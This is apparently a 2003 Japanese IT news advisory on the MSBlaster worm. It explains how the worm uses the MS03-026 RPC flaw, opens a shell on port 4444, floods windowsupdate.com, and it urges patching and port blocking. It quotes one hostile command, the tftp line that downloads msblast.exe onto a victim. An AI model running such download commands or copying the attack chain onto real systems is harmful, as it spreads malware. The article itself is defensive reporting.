セキュリティ組織やセキュリティ・ベンダー各社は米国時間8月11日,Windowsのセキュリティ・ホールを悪用して感染を広げるワーム「MSBLASTER(Blaster,MSBLAST,RPC DCOM WORM)」を警告した。セキュリティ・ホールを悪用して自動的に侵入するとともに,8月16日以降,マイクロソフトの「Windows Update」サイト(windowsupdate.com)へDoS(サービス妨害)攻撃を仕掛ける。ワームによるものと思われる,TCPポート135番へのアクセスが急増しているという。きちんと対策が施されていることを改めて確認したい。
ワームが侵入のために悪用するのは, 7月14日に公開された「RPC インタフェースのバッファ オーバーランによりコードが 実行される (823980) (MS03-026) 」である。このセキュリティ・ホールは,“超特大”のセキュリティ・ホールとしてIT Pro でも何度か警告している。
ワームは,あるアルゴリズムに従って選択したIPアドレスのマシンのTCPポート135番へアクセスして侵入を試みる。セキュリティ・ホールを悪用して侵入に成功にすると,そのマシンでシェルを起動する。シェルはTCPポート4444番で外部からのアクセスを待つ。
次に,ワームはそのシェル上でtftpコマンドを実行し,感染元のマシンからワームの本体である「msblast.exe」をコピーさせる。具体的には,「tftp <感染元マシン> GET msblast.exe」を実行する。感染元マシンでは,ワームは事前にtftpサーバーを起動しておく。そして,msblast.exeをコピーした後,感染対象マシン上でmsblast.exeを実行する。
msblast.exeは,圧縮ソフト「UPX」によって自己解凍形式で圧縮したファイルである。圧縮時のサイズはおよそ6kバイト,解凍後のサイズは11kバイトである。
msblast.exeが実行されると,そのマシン上でワームが起動され,さらに別のマシンに感染を広げようとする。加えて,システムの日付が8月16日以降になると,「Windows Update」サイト(windowsupdate.com)へ,「SYN Flooding」と呼ばれるDoS攻撃を仕掛ける。このとき,攻撃元(ワームが動作しているマシン)のIPアドレスを偽造する。
SYN Floodingとは,TCPのコネクション確立の手順を悪用するDoS攻撃のこと。SYNパケットだけを大量に送出して,コネクションを受け付けるバッファ・メモリーをいっぱいにし,ほかのマシンからのコネクション要求を受けられなくする攻撃である。
さらに,マシンを再起動するとワームが実行されるように,レジストリを変更する。そして,レジストリ変更後,マシンを再起動する。【8月13日追記】ワームには,マシンを再起動する“機能”はない。レジストリを変更するだけである。【以上,8月13日追記】
「RPC インタフェースのバッファ オーバーランによりコードが 実行される (823980) (MS03-026) 」のパッチをきちんと適用していること,および,TCPポート135番をはじめとする“危険なポート”がきちんとふさがれていることを改めて確認したい(関連記事)。
◎参考資料
◆RPC DCOM WORM (MSBLASTER)(米SANS Institute)
◆MS DCOM RPC Worm(米Symantec,PDFファイル)
◆W32/Blaster worm(米CERT/CC)
◆"MS Blast" MSRPC DCOM Worm Propagation(米Internet Security Systems)
◆「『W32/MSBlaster』ワームに関する情報」(情報処理振興事業協会セキュリティセンター)
◆「Blaster に関する情報」(マイクロソフト)
◆「WORM_MSBLAST.A」(トレンドマイクロ)
◆「W32/Lovsan.worm」(日本ネットワークアソシエイツ)
◆「W32.Blaster.Worm」(シマンテック)
(勝村 幸博=IT Pro)
